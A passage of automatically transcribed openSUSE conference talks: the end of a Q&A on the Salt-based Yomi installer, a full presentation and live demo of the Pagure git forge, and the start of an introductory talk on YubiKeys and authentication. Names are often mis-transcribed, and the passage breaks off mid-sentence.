the system was installed by Yomi and was in a successful state. The mark is applied at the end of the installation in the post installation stage and it's checked at the beginning because it's an estate, I checked that and you don't touch that. At the same level, if you want to force the installation of your device, you have another flag that is reformat takeover and this is going to take care of that. So it's a pillar that you say, you know, I don't want to take over. I want to already apply the jam, the installation step there and be sure that nothing is breakage. But the question is more deep because the concept of ownership of a resource and this is very deep and it's something that is a problem in Kiwi, it's a problem in Autogyas and it's a problem in Yomi. It's the ownership of the resource. For example, file system tab, who is the owner of file system tab? Sometimes it's a new package, sometimes it's an estate, sometimes it's an execution model, who is the owner of that? So if you add a new line that is going to register bar slash bar there and later there is a package that is checking that in the case of ETC, micro s is doing exactly that, who is the owner of the line? So ownership is something that affects the event. Because you don't want the event there. Because if a package later change this line, you don't want to reset that. So yeah, I need to leave. So this is something, a very deep question and I try to fix that use by use case. Okay so I guess the other one about linear programming is out so we can discuss it out there. Thank you. Thank you.
When we want to install openSUSE in out laptop we will use YaST. It will take care of all the details required for a correct partitioning, bootloader installation, time zone selection, network configuration, software selection, etc, etc. But when we want to install 100 nodes in our cloud, each one with a different hardware profile and a different role in our infrastructure, we need something different. AutoYaST can help with this, but there are some limitations, as we need to provide XMLs adjusted for those hardware profiles and roles, and we need a different tool to orchestrate those multiple installations. Can be done, but we can do better. SaltStack is a tool used to manage configuration and provisioning of machines, and we propose use this tool to drive the installation of openSUSE for big deployments. I want to show a WIP installer based on Salt, that can be naturally integrated in any other Salt-based solution, and I would like to talk about the ways that we can improve it in the future.
10.5446/54408 (DOI)
So, good afternoon, everyone. So I'm Pierre Chibon, also known as Pingu. Niel and I are going to introduce you a little bit about the Paguer project. So what's on the agenda? Basically we'll start with what Paguer is. We go back a little bit through the history of how it came to be. I'll present you a little bit further what the state is currently in and some of the features it has. I'll speak quickly about the ecosystems and some of the applications you can find around Paguer. Some of the ideas we have for the future. And then Niel will take over for attempting Murphy and see if we can actually get a live demo to work on stage here. So to the start, what Paguer is. So it's very hard word to pronounce for non-French people. You can ask Niel as a problem for it. Yeah, Paguer is a hard word to say. So it's the French word that refers to the Latin word Paguerus, which is a family of seashells, of which the most well known is the Paguerus Bernadus, which is also known as the Hermit crab. And some of the pictures you can see in there. It seems to be anecdotal from this, but I'm actually going to come back on this a little bit later because there is a little bit of a meaning behind this using this name. So for the purpose of this talk, Paguer is going to refer to a lightweight, gig-centric, Python-based, full project hosting forge, which also happens to be, you know, the GPLV2 or later versions. How does it come to be? Well, it started in the federal project and more precisely because of the release engineering team. So the release engineering team in federal used to work in a close proximity to each other, but also a little bit of a hard to reach team in federal. You could, it was hard to collaborate with them. It was hard to reach out, to figure out what they were working on, how they were working on them and see where you could poke at things to help them. So they were self-conscious of that and they wanted to improve that situation. So they wanted to open up the collaboration to get more of the people in the federal community to help with release engineering. At that time, we have Paguer, which was then called ProGit, as a proof of concept of the site, something which I worked on the site to see. The security was looking at the interaction between Python and Git. So why Paguer? Well, GitHub is the default nowadays platform for building open source software, for building software engine. The main issue is, if you look at the licensing, you're probably all aware of that, but GitHub is not a free and open source software. So for release engineering in federal, they were really attached to the notion of using only free and open source software to build federal. So GitHub was out of the picture. Then we have a number of competitors. We have fabricators. We have Garrett. But those are actually mainly about code review systems. They are, I spoke with one of the fabricator developers back then, and there was ideas about including an issue tracker in fabricator, but it was something down the line and not a priority for a project. It wasn't what the project was meant to for. And for GitLab, one of the requirements we had then was that everything in federal infrastructure had to be deployed from an RPM. And GitLab package has been a multiyear tentative, which has never succeeded. We've never been able to actually get GitLab package in federal, despite having several people working several years on this effort. And there's a second component to the GitLab. I don't know if many of you have been actually trying to maintain GitLab, but I will let Neil mention some words about that. So GitLab is great when you're using it as a user, and it has a lot of powerful functionality, but on the flip side, when you're administering that server, your life is kind of hell. The options tend to change quite a bit. The way that it actually handles its upgrades is rickety as best. It's always a new surprise what breaks in a GitLab upgrade. There was, for one of the places where I have maintained a GitLab server for going on a couple of years now, there was an entire release series, like three or four releases in a row, where merge requests did not work, because loading a merge request would cause it to spike up. The browser would be overloaded. There would be so much JavaScript, it would all fall over and you couldn't actually do anything. That sort of defeats the point of something that kind of emphasizes a merge request style or pull request style workflow. So it was not fun. So we've all just considered the reason-generating team in Fedora decided, let's give Pager a try and see how we can bring it forward. This has impacted also another team in Fedora, which is the infrastructure team itself. Back then, we were running something called Fedora hosted.org, and it was a place for projects where Fedora contributors were upstream. So just a place where you could use your code. Remember that Fedora basically started a little bit before GitLab, or at least before GitLab became what it is today. To the point that we actually were using track 0.12, I forgot to fix that version. So we were still using 0.12 even after the one.orelease was released and out. We were running different instance of track for each project. It was on self-service. So basically, if you wanted to create a new project in the Fedora ecosystem using the Fedora hosted.org domain, you would have to open a ticket to the infrastructure folks. One of them would wake up, see the ticket, process it, create the corresponding Git or SVN or Mercureo and Bazaar. I don't think we did. We have CVS back then. But we were offering all of these options and set up the track for you. So it could take between a few hours to a few days before you were actually able to publish your code. The other place where we stored code in Fedora is the Git repo. It's the place where we have a Git repository for every package we ship in Fedora. The thing is, for a while, there was no collaboration model on this Git. If you wanted to contribute to a patch to a spec file, the best way to do that was, you know, go to bugzilla, open a ticket and attach a spec file in there. And I'm sure we all love the review patches on bugzilla tickets. So this has come to what Pager is today. So to give you some dates, the first comment on the project is from March 2014. So a little bit more than five years ago. The Pager.io itself was released on May 2015, so a little bit more than a year after that. Fedora was sent in 2017. Source.fedoraproject.org was launched on February 2017. So this is our Git instance. Oh, sorry, on August 2017, that's our Git instance. And CentOS has recently also deployed Pager on the top of the Git last April. How does it look from a usage point of view? Well, Pager.io has about 1,600 projects today from about 700 users and 140 groups. Needless to say that the number of projects that we have on Pager.io is vastly greater than what we ever had on federalist.org, just the fact that you just can self-service as tremendously helped in there. So if you're wondering how Pager scales, on Fedora, we are running an instance that has about 30,000 projects. That's our Git. You know, almost 3,000 users. CentOS just started and they only have 7,000 projects so far. And on the scale ID, I'm aware of one Pager instance that is running with close to 45,000 projects. So it does scale to some extent. So what does it do? Well, it's a forge, you know, nothing new in there. We have a place where you can host your code, where you can place your documentation, where you can have an issue tracker, report bugs, report RFEs. And it provides the now de facto standout fork and pull request or launch request workflow. One of the, some of the features it has, it's designed to not be platform looking. So each project is actually composed of four Git repositories. One is the main one you interact with, the one that you're the most used to, which holds your code. The second one hosts your documentation. The documentation can be text files, HTML, markdown, REST. The markdown and the REST file will be converted to HTML on the fly. And then we have another two Git repos, one that contains all the ticket metadata and one that contains all the progress metadata. So if you want to move out of Git, of Pager, you can download these four Git repos and you have everything that is in the database for Pager for your project. It also comes back to the Pager instance, the Pager animal on the side there. Because one of the general idea was that you would be able to move a project from a Pager instance to another one. And that's actually also how we migrated our project from federalhasty.org to pager.io. We dumped the content from track, formatted it in the way that Pager expected it, enabled the hook on the ticket and the pull request tracker, get pushed, and everything appeared on the Pager side. So one of the original idea behind this was also that you would be able to have a private internal Pager instance and a public external Pager instance, and you would be able to sync issues from one to the other or pull request from one to the other. We also provide mirroring to Pager or mirroring from Pager. So if you look at Pager, we basically eat our own dog food. So Pager.io slash Pager is the original project. But Pager is also present on GitHub and on GitLab.org. We have a third-party plugin mechanisms, and we're starting to make use of this on the DissGit instance of Pager in Fedora so that we are able to prevent new endpoints that allows us to expand the use of Pager without putting in the upstream code endpoints logic that is specific to a DissGit deployment. So something we worked on recently. In Fedora, you have a point of contact, you have a main principle maintainer for every package, and sometimes that person goes away. And then the package is orphaned. For a while, people are able to un-offend the package, just make it their own. So we have a mechanism using this. We are able to say, well, if the package is orphaned and that person is a Pager, they are able to take the project from this orphan user. We have an extensible GitHub system. So if you want to write your own Git hooks, if you want to make it available on all the projects on your for or something that is optional, it's easy to do. We have teams. So we have four teams by default. I'm going to quickly go through three of them. This is the Pager.io one. Very simple. We have a very similar one for the DissGit instance. This is it. This reminds me of the presentation we had yesterday about using similar team across applications. This is the Git.CentOS.cord. And this is the closest one to the default. They basically only changed the logo on the top here. And for the first team, I'm actually leaving the surprise for a little bit later. Some of the other things it does. So how does it check SSH access? How does it check who can access with triples? Well, originally, our DissGit instance was using Gitelite. So we built Pager on the top of Gitelite. And to some extent, you could consider Pager to be some sort of self-service admin interface of Gitelite. But we very simply also get rid of it because it has given us a lot of problems. When you have 30,000 repositories and you refresh the Gitelite configuration file and you need to recompile it every time, you're adding a new contributor to a project or adding a new project. It can take a little bit of time. So we also figure we have also now Pager itself a ways of deploying it without Gitelite. And some of the things which is also nice, you can just reply to a comment, you know, whether it's from a progress or from an issue by email and it will show up in the database and in the UI. We have also a number of notification systems, the classic web books that now everybody uses, but we also support a number of message posts. So we have FedMessage, which started to be the Fedora message bus and then got into federated message bus, which is a MQ based, so it's a very much a fire and forget system. We are moving from FedMessage to Fedora messaging in the Fedora infrastructure, which is MQP based, but we also support Stomp and MQTT notifications. So to give you an idea, Fedora is using the top two, I know about one instance that's using the third one and the Git, the centers folks are using the MQTT one. On the community side, we have 146 contributors. It seems to be not so much. I mean, you know, when you look at bigger projects on the other side from the infrastructure point of view, this is definitely the project that has had the largest number of contributors. They used to be 40% of the contributors in the top ten that was not read at employee, except that we are one of them, so it's only the top three out of the top ten contributors. It's only three that are non-read-out today. And we have listed here the three public instance, which I've already mentioned, but we are aware about a few private instances as well. One of them I'm not going to reveal in secret here is run internally at read at, others are run in different companies. When it comes to the ecosystem, it's a little bit around Pager. We have, so with the principle that you can have the issue made at present in the Git repo that you can clone, there is a small utility which is called PagOf, which basically lets you interact with your issue tracker offline. I use this all the time. When I'm traveling, when you're on a plane, when you're on a train, you can just do something like PagOf, list Pager, and it will go to your local clone of your Pager tickets and give you all the tickets that are open. You can assign them to yourself, you can close them, you can comment on them, you can do anything offline. And when you reach network again, you just do a Git pull, Git push, if you have enabled the right hook on the UI, your ticket is up to date. I find this very handy. We have a small Python library that interacts with the Pager API. It's not feature complete, something that was started by contributors in the Pager project. So it's not Fager complete, it does not cover the entire API, but it gives a base where people can collaborate if they need to or if they want to expand and interact with Pager in a project. The third one which I'm going to speak about is called Repo Spanner. It's something which is fairly new, we are currently running it and rolling it in production. It's a distributed Git storage server. So one of the issues of Pager is that it needs direct access to the Git repo, which means that you can't really do load balancing unless you actually use something like NFS and then you run into... It's doable, I know in the sense of Pager that is running with the Git repos on NFS. It also can be a pain to deal with once in a while. So Repo Spanner partly solved that because you basically create a cluster of Repo Spanner nodes and it mimics a little bit what GitHub uses in production. So every time you push something, it will sync your push to the nodes and it needs the majority of the node to hack the change before it allows the push to go through. If the majority of the nodes is unavailable or not able to hack your push, it will deny the push and you will have to retry it later on. This also means that if you have another cluster of three and two have accepted the push, then the third one is going to catch up later on. It's very powerful. It's complex, but it's very powerful and it's quite a nice piece of software. So that's what it is today and what you can find around it. And the ideas for the future. This used to be roadmap, but I fear that using the terminology roadmap here meant a little bit more this is going to happen while these are more foggy ideas of things we could do. I don't know if we will go to them. One of the ideas actually to do a tighter integration with Repo Spanner. Currently, Repo Spanner is entirely optional. Moving to it would actually allow speeding up a number of operations in Pager. Pager relies on Paggitube, which itself is a Python binding to the libgitube libraries, which has a number of issues, one of them, for example, is doing a cloning a Git repo leads, leaks file descriptors. So if you have a lot of clone running at the same time, you end up with too many false open exceptions. To the point that I was receiving tens of females about this problem and I have actually replaced the libgitube or Paggitube repository clone by a simple suppressor Git clone. I'm very unhappy about that, but that's actually was a better fix than keeping on what it is today. So moving to Repo Spanner would actually move more operations to Repo Spanner, making it not optional would allow us to farm out some of the Git operations to Repo Spanner, which is what it means to do. Improving the content of the webbooks and the notifications, that's something that Nila has reported, basically apparently the payload that we're sending on the webbook and message post notification is not enough for everyone to act upon. So we need to identify what content is missing from these notifications and, you know, add it in there. We would very much like to be able to figure out a way of having a CI system integrating on Paggitube and to make it as easy as, you know, opting in into Trevi CI. So it's probably going to be something like you have a checkbox in the settings and a YAML file to do in the source, and it would automatically run the CI, triggers it on ProRequest on commits and let you know how it went. One of the ideas which I have on the back of my head is the ProRequest dependencies. So if you work on different features at the same time, you're probably using different branch for each feature, and potentially a feature is going to depend on another one, or just because you want to merge feature A and then B and then C, even if they are independent from each other, if you keep opening them all against master, it's great, except that your CI system is going to compare what is feature A against master, what is feature B against matter, what is feature C against master. And every time you want to, you merge one of them, you need to rebase the other two to be able to see, okay, what is the CI system now saying with A merge and B and C. And so if you're able to say, well, I want to merge A first and then B and then C, then we would be able to show you the ProRequest of C against B, B against A, A against master, and your CI system would be able to say, well, I'm running A against master, I'm running B against A and C against B. And well, you know, if you change the order, you just change the dependency order. And I would make reviewing easier because you would not, because of chain pro, you would see the diff only of feature C against feature B and not A, B and C against master. And you would also have, when the CI system runs and you can go through the code and there is nothing to change, you can just, you know, merge A, B and C in one go and you know your CI system was really tested, A, B, C, merge together. One thing which we also have is the ability of creating a ProRequest from an email. So basically sending a diff or a patch to a certain address that would open a ProRequest to that project. So again, these are not necessarily things that will be done or will be done in time soon, but these are things that are on the back of our mind and we would very much like to do. Or you know, if anyone in the assembly would like to work on any of these tasks, we would very much like to help you on get this merged in. And with this, I will let Lisi if we can actually master Murphy for this afternoon. Let's see if this... And this time we're going to do a thing where I move this over here. So this is a virtual machine running OpenSUSA leap on it and I have this running on here. So this is a Pagger instance running the surprise theme which is actually contributed by Stasiak for Pagger a while ago when we did the 5.0 release. It's based on the theme that came from software.openSUSA.org. So it's the chameleon theme as it's called officially the tree and I pulled in a couple of projects in here to kind of show off what it looks like. So this one's the RPM config SUSA project which was... I mirrored this actually from GitHub earlier this morning and pulled that in into here and you can see like there are the changes that went in from these people. If I do this one here, you can see the diff, the commits, you can even see all the references, hyperlinks are clickable and that will go to the place of the GitHub's other branches, the original version of RPM config SUSA that I wrote is there. And the other one I pulled in was something that kind of looks somewhat like what we have in Fedora with this Git where I pulled in the salt packaging repo that's on the OpenSUSA GitHub org. And in here you can see there's the patches in here. And you can see that the diffs are actually highlighted correctly. And then if we go to a spec file here, the spec file syntax highlighting totally correct has the comments and descriptions and whatnot. And then let's see all the crazy branches for all the different versions and all the crazy things that have been going on in here. No tags releases. So a little bit in here. That's the wrong terminal. Hold this. Thank you. That makes that easier. And I'm going to switch this to mirroring because this is very, very hard. Don't use a separate mirror. And there we go. Now from in here, let's go into salt and I'm going to do, yeah, let's put some bigger fonts. Not the right one. This one. So in salt here we've got all of these crazy files. I'm going to get MV all the things to the top level directory. Git, RMR, the salt directory because the salt directory doesn't exist in Git anymore because that's how that works. Git commit dash M. Move to top level. Author. And open suzer.org. And we'll do a dash s just for the funsies. Has not name, email and does not match. Oh, because I forgot the funny quote thing at the end. There we go. And then it's going to make that commit. And that is, I am moving a shitload of files. That's probably going to not be fun no matter what with Git. Do it. Or are you going to just clean, hold this for a second. Bloody demos. All right, git config global user email and gump at open suzer.org. Git config. I can't believe I'm doing this now. Shame on me for not trying this part first. Now I can do this. There we go. And then git push. Actually, we're just going to do a fun thing. Let's gitify bash push. Push this here. V. Push that here. And that is pushed. I can create a merge pull request right here. And we see here open PR. And I can do this against, normally I could do this against like a fork or whatever, but since I just did it within this repo, there's a thing, create the pull request. You can see I changed 21 files here, moved to top level. You can see I renamed all these things. There's no diff here. So it's got smart diff recognition for renaming. And then delete branch after merging and merge. Confirm merge. Yes, the worker should be running. Otherwise, very bad things would be happening right now. Oh, very bad things might be happening right now. Journal. Hold on. Okay. A few. Backer or worker. And because of that, pseudo. Grabbing lock for one. It is doing stuff, right? Task is running. Yep. There we go. So it's starting to do stuff on the inside. You can see it's doing get things and is it still like trying to do this merge? No, it's done. There we go. Moved to the top level. Top commit. Branch went away. Nope. It's still trying to delete the branch. But there we go. And you see here on the top level, all the files are here. Read me about SZA. Did funny things in the XI lighting. But spec is all here. And the pull request is done. Yep. So there we go. That's the kind of the basics of what the packer interface stuff looks like didn't go quite as perfectly as I hoped. But I think it went okay. And you will get the very important question. I mean the very important slide now. And the very important slide that says thank you for your attention and if you have any questions. And I see one on the back there. Hi. Thanks for the presentation. So my question is does bagger support PGP signed commits? So the question is does bagger support GPG signed commits? So as a Git repo, it supports GPG signed commits. It does not currently show them in the UI nor validates that the commits belong to the user. So you can't associate a user with a, you could via the email address I guess. It does not show that in the UI but the backend does support it like any other Git repo. Would this be a good feature request? There is already a ticket on that. Another question coming. How do you store the binaries? So you have a spec file and patches but usually you also have tar balls and binary files. How do you store them? So the question is how do we store the binaries on the federal GIT I guess? So is the Git integrated solution for that? I mean I'm from the open source world so I have no clue how we do that. So in federal we split in two different locations the tar balls from the spec files. The spec file on Git repos and tar balls on the lucosite cache on the side of it. And our build system pulls the spec file which also contains the file sources which includes the checksum of the tar balls and retrieved using that checksums retrieved the corresponding tar balls from the lucosite cache. So if I want to do a code hosting scenario using the paga what are the key gaps slash differences between paga and let's say GitLab? What are the key differences between paga and GitLab? My tech will be it's going to depend on what your technology stack that you're currently using. If your team is familiar and well versed in Ruby and knows how to maintain GitLab instances then you know I would probably rely on GitLab. If your team is a Python shop or doesn't have much experience with running Ruby instances paga is probably an interesting product to look into. A little bit of this. The other thing is if you're running more constrained environments like one of the things that finally pushed me to starting to look at paga more was that I could no longer run GitLab comfortably on my tiny cloud VPSs or on my little crappy ARM servers that I have at home. So with more constrained environments or more flexible environments paga is a lot easier to roll out and manage. It's easier to plug into other infrastructure if you really want to because of the way that the architecture is set up whereas GitLab is a very large monolithic Ruby on Rails thing with weird hybrid things all over the place. So at least if you don't need all of the fanciness that GitLab has and if you want to have a somewhat smoother and easier experience maintaining your Git server and you've already got maybe and you have some level of Python experience for maybe if you want to extend things a little bit paga is a lot nicer of a choice than a lot of the other alternatives. So it's production ready then. I mean we're running it all over the place. I personally have two private paga instances one that runs on Fedora and one that runs on openSUSA and mainly because the openSUSA one runs on Python 3. But in the Fedora project we've got several of them. I think we have two production ones, two staging ones and then CentOS has a production and a staging. Then we have a thingy that floats around doing stuff. There's a few, I know of a few public independent instances that exist. You can kind of find them if you know how to Google for them. There's also a few people that are using it for their internal corporate paga instances and they've actually contributed fixes and improvements to us as well. So the low barrier to entry to contributing and making the software better is actually I think a huge plus point for a lot of people. Just as I note on the resource constraint, I actually managed to get paga running on a banana pie. I'm not saying it was fast. I'm not saying you want to run the Linux kernel tree in that paga instance. But it did work. So two more questions, first of all, when it comes to using it internally, has your Red Hat product team ever thought about integrating it into the OpenShift story or so? Or are they on a completely different track with their technology stack? On the second one on the CI, do you already have any direction like is there an existing CI project you would want to integrate or are you going to build this from scratch? Are there any ideas about that one? So there are two questions here. From a product perspective, has Red Hat considered paga to become something to predict? To predict is not actually able to answer that question. I don't think it has been considered as such. It is run internally and I can also say the internal instance is running in OpenShift. That's how we know it does run in OpenShift. And the second question is about the paga CI. So we currently support Jenkins and you can point paga to any Jenkins instance that paga can access. The Jenkins we mostly use is the one that is hosted by the CI.centos.org folks just because the Centos folks are next door neighbor and we can actually easily poke them and see how it does. We would like to integrate with more CI system. The question has been, so far, CI.centos has been on our needs. So it puts less pressure on integrating with others. The architecture used is extensible so we should be able to integrate with other CI system. We haven't managed to actually get this done yet. So at least with the paga CI stuff with the Jenkins, the way that the paga CI is set up, when you set up a project and turn on the feature, you tell it what Jenkins instance you'd like to configure it with. So for example, if somebody had a project on paga.io, they could easily, and that was focused mainly on SUSE things, they could point it at CI.opensusa.org. If they have the authentication set up to be able to do it, it can actually run CI jobs there, track the statuses, report back and do those kinds of things. We have been looking at a number of other kinds of CI systems to explore for improving to get Travis CI or get lab CI-like quality of ease of use for managing CI. It's just difficult because the space is very confusing, is to put it mildly. Insofar as plugging it in with stuff like OpenShift, one of the things that I've been doing because of the stuff that I run is I'd like to plug with the build release pipeline that's included in OpenShift with paga. And part of that is where we've been working on beefing up the notifications and the web hook stuff so that stuff works a little bit better. There's already a project that was written by one of the paga contributors that actually bridges the gap already in a slightly different way, but I'd like to have more direct support for being able to integrate with more systems for these kinds of things. And that's kind of where part of my focus has been recently for these kinds of things. Does it have a Helm chart? Does it run on Kubernetes? We don't have an official Helm chart for it because I know that one exists because one of the externally run private instances of paga is run in the Kubernetes, but nobody has stepped up to contribute a proper Helm chart to us. We would love to have one. It's just nobody has given one to us. Thank you. I think that's the end of the question. So thank you all for your attention and have a good afternoon.
Pagure is a new, full-featured Git repository service for the web, written in Python. It is similar to other popular Git-based forges, allowing developers and contributors to share and collaborate on code and content. It also has some unique features not found in any other Git forge providing the basis for decentralized, federated software code hosting and development. It's fully free and open source software, and it's included in openSUSE Leap 15.1 and openSUSE Tumbleweed! The agenda of the presentation: - What is Pagure - History of Pagure - Current state and features of Pagure - Current ecosystem around Pagure - Plans for the future of Pagure - Demo of Pagure on openSUSE
10.5446/54409 (DOI)
So, my name is Carl Waddle. I'm working for Susan, and I will talk about UVTs. There are only very high level of introduction, and you don't have to hear any deep philosophical topics or something like that. In case you don't even know what UVTs are about, this is a picture of some of them. So, there are a few thousands that you can buy, and mostly you can use via USB, or other options. And you can interact with them by pressing a button, and with certain applications, magic will happen. And this talk is about some of the magic they could do. Some of our reasons, basically, like all of us, I assume, are open source and full-gest, and I said, work for Susan, because we're the engineers, and we're now infrastructure teams, so I'm in touch with this UVT, and I'm also using it everyday in the baby world. I somehow am learning enough to love cryptographic stuff and authentication, I T-secure with those kind of topics, and I also maintain some of the UVTs, or with other people I maintain the UVT packages in Susan, Susan products, and also in Arch. So, the agenda for today is something like this. I will talk about authentication in general, and I will tell you why we actually need something like a password, because passwords have certain kind of problems, and half of the things can happen. Then I will go quickly through the modes that the UVT made, so there are different modes that the UVT supports. We will talk about some of them on a high level. There's a workshop scheduled for tomorrow. We can go into all of the details and how to actually set this up, but today it's really about, from a user's point of view, how am I supposed to use this image. I'm not about taking the details and the configuration, but I also plan for some demo time and Q&A in the end. So, in case you want to read up on this right now, after you talk about the links, for the users themselves, this is probably most interesting to you. It's the workshop of UVT, or UVCOP, it's the vendor of UVTs, and they have a lot of resources and they explain in very detail what kind of products they have and how different modes actually work. There's also the site.total.off.info where you can find out which service providers right now are supporting what kind of tokens. So you can find out where you can actually use those tokens. And there's another page 2 vector which is doing similar things. If you are a developer and you want to find out more on how to develop applications and enable your applications for this kind of stuff, I would recommend those resources for this topic. So, some of the application basics. Basically, everybody, every day is doing it. But probably the moment you see a person and you know what you're doing, then you're basically confirming that, yes, this is the person I know, and with computers it's already a bit more difficult because everybody can sit in front of a computer and claim to be someone else. So, abstractly speaking, it's only confirmation of an identity or the process of confirming an identity. This is what the video is saying about it, but it's very easy to understand. And in our context, when we are speaking about user authentication, we are answering the question, who am I speaking with? So, there are also other kinds of... So, whenever you speak about authentication, there's also this term, organization, and obviously there's a difference to this. So, authentication is the answer to the question, who am I? And this is some of the variations that can be used when you're referring to authentication. And with authorization, we are answering the question, what am I allowed to do? And they are highly coupled most of the times, but in order... And because basically in order to authorize something, we need to know who you are speaking to the first bit. But technically there's a whole different things, and there are also different protocols that are different aspects of this. And so, when you're talking about authentication, there are three things we can use to authenticate someone, and this is something you are that's parametric to expect an attribute like fingerprints, faces, face recognition, or voice recognition, iris scan, stuff like this, which you probably already know from your smartphone, your fingerprints being in some... Then there's something you know, which are basically password pins and other kinds of secrets. There can be something that you have that you can carry along, and that's like a physical key, so you can open a door, or sort of a cyber token, those smartphones, and in our case it's a LUI key, and this is the category of something that you have. Those different kinds of things you can combine when you're authenticating someone, and you end up with two-factor authentication, for instance, which of course you all have worked for now, and in general this is a very good possibility for authentication. Whenever you're dealing with authentication, you always have to balance out those three aspects, there's the security aspect, which probably most of the security engineers look at, but at least as important is the usability and deployability, so is it actually usable by normal people, and what are the costs of using and operating this stuff. So a token from the utility point of view, and it's about $50, so it's a cost to use this password for people. So there's a lot of authentication protocols, just some of them, and they are addressing different problems, and we put on a different point on this, but in the end, basically there's a lot of options, there's not one really perfect solution, but there's always some sort of technique. And what's actually wrong with passwords, because there's a lot of stuff that's good about passwords, they're easy to use, easy to implement, they're very universal, you can use them everywhere, it's easy to implement, so in the end it's only a strict comparison, and we have even some recommendation with practices from the East Institute, for instance, which is telling us how long a password is supposed to be, because there should be different classes and so on. So on the other hand, passwords are also challenging, and it's also something that you earn here all of the time, so people are using read passwords, they reuse the same passwords, people have been phished or they enter the password in a place where they are not supposed to enter it, and on the other end, the people that are getting our passwords, they have reached all of the time, they use wrong practices, so they have hashed them wrongly or not at all, they don't apply passwords, stuff like this. They are also very difficult to handle, because obviously we're humans and we cannot remember a lot of random prep, so we need to use password managers or some other schemes, which makes them difficult to handle and also no fun to enter, if you have a lot of special characters with different keyboard layouts and stuff like this, it's not a lot of fun to enter them, if you have to do it often. And also, even if you have very strong passwords, they do not protect against a lot of attacks that are being done in real world all of the time, so you can still, once you know a password, however you found out, you can reuse it all of the time, so this is the kind of replay attack, it can be phished, you can do it in the middle, stuff like this. And the reality is basically a richer of all of what I've just said, so the daily reaches with billions of passwords, passwords lying around somewhere on the internet in the dark web, there's a wrong understanding, so for years and years, NIST was recommending that you need to reset your password every 90 days, and basically everybody is doing this because it's also implemented in active territories and stuff like this, and even the guy who came up with this at some point said, hey, I'm sorry, this was totally crap on noise and it doesn't make a difference, but we're still stuck with it, so there's even some... among the experts there's some misunderstanding, and you can also, people are always arguing, hey, you just need to train people and tell them about it, but actually there are papers from the 70s and 80s where they are saying, hey, passwords are weak, people are using weak passwords, and after 40 or 45 years of education, we are still having 123456 and password is the most used password in 2017, for instance. So I just want to... and one way on how to improve this is to use hardware, and this is for instance a bunch of different hardware, and you can see Yubikis, which the story is about, but there are also a whole bunch of different keys or hardware that is doing a very similar thing, and actually with U2F and Web of N, there's this standard, those are open standards and they are cross-competitive, so you can actually use any of those keys for this particular one, and hardware is also used with many different applications, and many different other applications, not only the user authentication, the computer, but also for like, in your car there's some secret cryptographic going on, and there's online transactions and so on, and before there was... before the Yubikis, we came famous basically, we used a lot of hardware, there were those hardware tokens that you had physically carry along, and you could press a button or they would just change the key every 30 seconds, like the RSA token or something like this, and you had them to enter this key, it is this online password basically, manually enter some key next to the password, and the Yubikis were basically doing a very similar thing. There are also smartpads, they can do a lot of more stuff than just... than just one-time passwords, they can be used to put certificates on you and stuff like this, but in the end, all of this is the basic idea is that we have a very... we have a secure environment where we can do cryptography, the keys that are used there cannot be accessed easily or at all, hopefully, the CPU or the processor in these tokens cannot run any commands, it's very close down, you cannot update it for instance, and there is... the goal is basically to make it difficult to hack and clone those devices, and the interfaces and so on, they are very similar, and there's not a lot of interaction that you can do, so you cannot do... or hopefully, I'm not able to make those... This is the picture you see in the beginning, so a lot of the... it's basically not against the Yubikis' specific path, and they are very intuitive to use, so the only interaction that Yubikis allows basically is to touch it, and there is a short and a long option, so you can either touch it for, I think, less than half of a second, and it's the short option, and there's another option where you can press it longer and it will use a different slot, but that's it basically, and it's also very similar, we want to explain this to your parents, for instance, this is very similar to a physical key, you have to carry it along, when you get it at home, you cannot go in, but the nice thing about this is that it cannot be easily cloned, and somebody has to physically steal it, for instance, if he wants to pretend to include it, so it requires physically possession. The minimum models, they have different interfaces, so USB is probably the easiest one to use, but there's also NFC included for energy, and the mobile platform stores are the most important to the community. The Unity in general, all of them, they support several different modes, and this allows different use cases, so it's not only this one-time password thing that I was talking about, but there's also a web of Android 2.0 component here, which is for authentication, the web culture, I will tell you, a little more about, but there's also the OpenBGP applet on there, so you can use it as a smart card or a GPG, you can use it for static passwords, so you can program it in a very complex password, and whenever you press the button, you just spit out this complex password, and there's also the more advanced applet, it's called TIFF, where you can actually manage identities and certificates, and you can just pretend to be a smart card, just like this, for instance, and with big enterprises, usually in the past, you'd get such a smart card and you would have to plug it into your computer, and this will then do some authentication, and the Unity can do the same things, but it's much smaller and much nicer on-factor. As you can see, there's a lot of different applications in there, basically, and there's a lot of different configuration sets, so actually, this is quite a complex device, but for users, it's very easy to take with it. So, let's start with one-time passwords, we were already talking about them with the other Apple tokens, and the basic idea behind one-time passwords is that you have a password that is only very short-lived, it can be used only once or for a short period of time, and this is used as an additional factor, so you have to provide an actual password, and then you can use our Ask for another one-time password. And there are a lot of different ways you can do this, and different vendors, and different source providers choose different routes here, so there are Apple tokens, like the RSA one I was talking about, you can have applications on your smartphone, you can use smart cards with the other thing, you can get a tongue, which is a little bit more secure, but pretty much the same idea, you can get it via SMS, a text message, some sort of the like, as we'll send you an email whenever you try to look in, you can get some portion of one-time passwords now, and of course, you can use the Ubiquit, which actually, the Ubiquit supports several modes for one-time passwords. So, the first one is the Ubiquit UBCO OTP, and the second one was basically what Ubico started Ubiquit, so back in 2007 or so, they created this little device, and it would just spit out random prep when you ever depress it, and the idea was that it's in the USB device, so it would be emulating a keyboard, and you don't need any driver support or anything, you could just type in some letters whenever you press the button. The service provider, when receiving this string of parameters, can then verify the one-time password. So, it just looks something like this, if you press it multiple times, it will spit out random parameters. It just doesn't have a meaning for us, but actually, this is encoded information, so if this Ubico refers to this mode text, it's not really empty because it's a little bit more complicated because they want to make sure that it's working on all platforms, so they have to, you can only use certain key codes, and not all characters basically, but in the end, there's information. And what this information contains is, on the one hand, a specific ID for this Ubiquit, so basically the prefix or some characters in the beginning are a Ubiquit ID, and the other stuff is the actual one-time password which is encrypted with a password that only the service provider, or in this case even Ubico, knows. And as a service provider, you can ask the Ubico, so you can send this one-time password to a Ubico server. They also have this key that's burned into your Ubiquit key, and then they can verify it. And there's also a counter for vision protection. The nice thing about this was that it comes pre-configured, you buy this thing from Amazon, put it into your USB slot, and it just works. It's based on a shared secret, and it was a third party which is the Ubico. You can host this for yourself, but this is a little bit more complicated, and most people don't choose to do so. So at least there are some trust relations with Ubico, because you have to trust the result. You let Ubico, so Ubico is doing the verification for you, so you end trusting them. And the nice thing about this is that it scales very well for users, because you can use it with any service provided at the support list, and there's not anything that you need to take into account to just press the button. In OpenSUSE, for instance, it works out of debug, because it's just an USB-Hit device. There are some applications called Ubiquit Manager. You can use this for some... You can manage some aspects of it, and swap these slots, for instance, so you can either 